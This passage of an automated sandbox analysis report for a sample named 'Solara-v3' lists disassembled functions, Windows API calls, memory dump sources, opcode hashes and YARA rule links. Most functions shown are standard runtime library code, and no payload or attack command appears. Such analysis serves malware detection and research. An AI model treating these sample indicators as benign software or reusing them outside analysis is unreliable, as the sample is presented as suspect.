                                                                                                                                                                                                                                                • Part of subcall function 00CAC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00CAD895,?,00000000,-00000008), ref: 00CAC082
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00CB4253
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00CB4299
                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CB433C
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2112829910-0
                                                                                                                                                                                                                                              • Opcode ID: 328bc223fe6a8756ff43bf0a937990e0952ee323e8b0ae6c386f1d851a9bd3e0
                                                                                                                                                                                                                                              • Instruction ID: 77ecb9d2c7a7597355393b3cbce207d932488c21bd7d145093db708d96324da2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 328bc223fe6a8756ff43bf0a937990e0952ee323e8b0ae6c386f1d851a9bd3e0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71D15A75D042589FCF19CFE9D880AEDBBB9FF09314F18412AE566EB252D630A941CB50
                                                                                                                                                                                                                                              Function 00CAB295 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AdjustPointer
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1740715915-0
                                                                                                                                                                                                                                              • Opcode ID: bfaf8115402cbab80066bef6e5ada9d6657475564793e3350448b19f05b2f48e
                                                                                                                                                                                                                                              • Instruction ID: 450d55fe9607930354861d8b817f0ff41387bb9a2790f15b2f510a67495ce40d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfaf8115402cbab80066bef6e5ada9d6657475564793e3350448b19f05b2f48e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5551F571602607EFDF248F50C981BBA77A4EF02718F24412DE916872A3DB31EE50DB90
                                                                                                                                                                                                                                              Function 00C97220 Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00C972C5
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C97395
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C973A3
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C973B1
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2261580123-0
                                                                                                                                                                                                                                              • Opcode ID: d1650e2014a9684414ad8a8c686be54ccd194fa859a1ec5f008cdad3c952527c
                                                                                                                                                                                                                                              • Instruction ID: 04e8f5fbeaa01dd01172b780450d045b7c1986828ef834f7bc963cc8a25d8224
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1650e2014a9684414ad8a8c686be54ccd194fa859a1ec5f008cdad3c952527c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B41F2B1A04705DBDF20EB64C949BAEB7A5FF44320F144639E82A476A1EB34E910DBD1
                                                                                                                                                                                                                                              Function 00C94460 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C94495
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C944B2
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C944D3
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C94580
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 593203224-0
                                                                                                                                                                                                                                              • Opcode ID: dbab324ea70ae2a0c3f456817f25f33f9732aa9497c4e73c3801cd0aed35e1c3
                                                                                                                                                                                                                                              • Instruction ID: f4cf9b82a8d9a09a4ee5bdf917a0f72f0d93d3fc1f421d25396b762294f5bb46
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbab324ea70ae2a0c3f456817f25f33f9732aa9497c4e73c3801cd0aed35e1c3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7414B71D002598FCF14DF94D888BAEBBB0FB48724F054269E819A7391D734AE56CFA1
                                                                                                                                                                                                                                              Function 00CB1DC6 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00CAD895,?,00000000,-00000008), ref: 00CAC082
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00CB1E2A
                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00CB1E31
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00CB1E6B
                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00CB1E72
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1913693674-0
                                                                                                                                                                                                                                              • Opcode ID: 5ea707a0256647bd323d7ccf0a33bab86e4e273e89e6b88e794f47a1b3c464ad
                                                                                                                                                                                                                                              • Instruction ID: c43c7d6e54cfe91936300db3a53c94748a4ad5d0d6f078d1436feb88670222a7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ea707a0256647bd323d7ccf0a33bab86e4e273e89e6b88e794f47a1b3c464ad
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D121D031600256AFCB20AF66CC989ABB7A8FF01369F588519FC29D3100D730ED00DBA0
                                                                                                                                                                                                                                              Function 00CA2BA2 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: a071df3d6d8e70ffd21d82ee0ef22073165a21fdc4ef79ffc29ea5cb5d79b31f
                                                                                                                                                                                                                                              • Instruction ID: bbc0e8f0a31bd1b24c0697e88618e1bf75938c08749a156950e2a384739fb84b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a071df3d6d8e70ffd21d82ee0ef22073165a21fdc4ef79ffc29ea5cb5d79b31f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39219D71204227AFAB21AF7DDC80E6E77A9FF4236CB104515F86597250EB30ED40A7A0
                                                                                                                                                                                                                                              Function 00CB31BE Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00CB31C6
                                                                                                                                                                                                                                                • Part of subcall function 00CAC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00CAD895,?,00000000,-00000008), ref: 00CAC082
                                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CB31FE
                                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CB321E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 158306478-0
                                                                                                                                                                                                                                              • Opcode ID: bbae9b0cd537dae8680e4b6dc945e8b03b86d78868b7df592a9854821ed73863
                                                                                                                                                                                                                                              • Instruction ID: d4a7f140d785955e6ff7d9a06ef1a926ad7b013d89f7acd3313473fc3b2a480e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bbae9b0cd537dae8680e4b6dc945e8b03b86d78868b7df592a9854821ed73863
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E011D2B1A011567EA72127B69D8ADFF6A5CDE9A398B100024FA01D2103FF64EF0092B2
                                                                                                                                                                                                                                              Function 00C9E892 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00C9E899
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00C9E8A3
                                                                                                                                                                                                                                              • int.LIBCPMT ref: 00C9E8BA
                                                                                                                                                                                                                                                • Part of subcall function 00C9C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 00C9C1F6
                                                                                                                                                                                                                                                • Part of subcall function 00C9C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 00C9C210
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00C9E914
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1383202999-0
                                                                                                                                                                                                                                              • Opcode ID: 313935537e81f86a60b6f9cf9507f54da14f46f9b7ace91bccba5a1b0eabfb12
                                                                                                                                                                                                                                              • Instruction ID: 1e479f88672ca5044d0361c0893245240be935cc184f649c94b40198e26c082c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 313935537e81f86a60b6f9cf9507f54da14f46f9b7ace91bccba5a1b0eabfb12
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 731100318002199BCF05EBA4C98DBBDBBB1AF94320F260008E415AB292CF309F40EB81
                                                                                                                                                                                                                                              Function 00CBADA0 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00CBA2EF,00000000,00000001,00000000,?,?,00CB4390,?,00000000,00000000), ref: 00CBADB7
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00CBA2EF,00000000,00000001,00000000,?,?,00CB4390,?,00000000,00000000,?,?,?,00CB3CD6,00000000), ref: 00CBADC3
                                                                                                                                                                                                                                                • Part of subcall function 00CBAE20: CloseHandle.KERNEL32(FFFFFFFE,00CBADD3,?,00CBA2EF,00000000,00000001,00000000,?,?,00CB4390,?,00000000,00000000,?,?), ref: 00CBAE30
                                                                                                                                                                                                                                              • ___initconout.LIBCMT ref: 00CBADD3
                                                                                                                                                                                                                                                • Part of subcall function 00CBADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00CBAD91,00CBA2DC,?,?,00CB4390,?,00000000,00000000,?), ref: 00CBAE08
                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00CBA2EF,00000000,00000001,00000000,?,?,00CB4390,?,00000000,00000000,?), ref: 00CBADE8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2744216297-0
                                                                                                                                                                                                                                              • Opcode ID: 56b4fca180dbced48009237d6d080c228d2a5ada0e073c4373e6c7ca29b511a3
                                                                                                                                                                                                                                              • Instruction ID: 36cd59df7e5d65f3a35238a66f67f294a379c6e1b0e22f8c9bdb178db6ae4cf6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56b4fca180dbced48009237d6d080c228d2a5ada0e073c4373e6c7ca29b511a3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AF0AC36504129BBCF221FE5EC08FDE7F26FF48BA1F044411FA5996121DB32C9A0AB91
                                                                                                                                                                                                                                              Function 00CA04F5 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00CA0507
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00CA0516
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00CA051F
                                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00CA052C
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                                              • Opcode ID: 56487f52023a03b4ee6d0d938840174c2bd46c1baf5d0e443e2cf2e79744514c
                                                                                                                                                                                                                                              • Instruction ID: 566d912549050a2ccc5e65d3fddfefa246a6c5de54c64c4a656ecac088534247
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56487f52023a03b4ee6d0d938840174c2bd46c1baf5d0e443e2cf2e79744514c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4F06274D1020DEBCB00DFB4DA89A9EBBF4FF1C200B914995E412E7110EB34AB449B50
                                                                                                                                                                                                                                              Function 00CB0976 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: GetLastError.KERNEL32(?,?,00CA5495,00CC8E38,0000000C), ref: 00CAC16E
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: SetLastError.KERNEL32(00000000), ref: 00CAC210
                                                                                                                                                                                                                                              • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00CA5BD5,?,?,?,00000055,?,-00000050,?,?,?), ref: 00CB0A35
                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00CA5BD5,?,?,?,00000055,?,-00000050,?,?), ref: 00CB0A6C
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                              • String ID: utf8
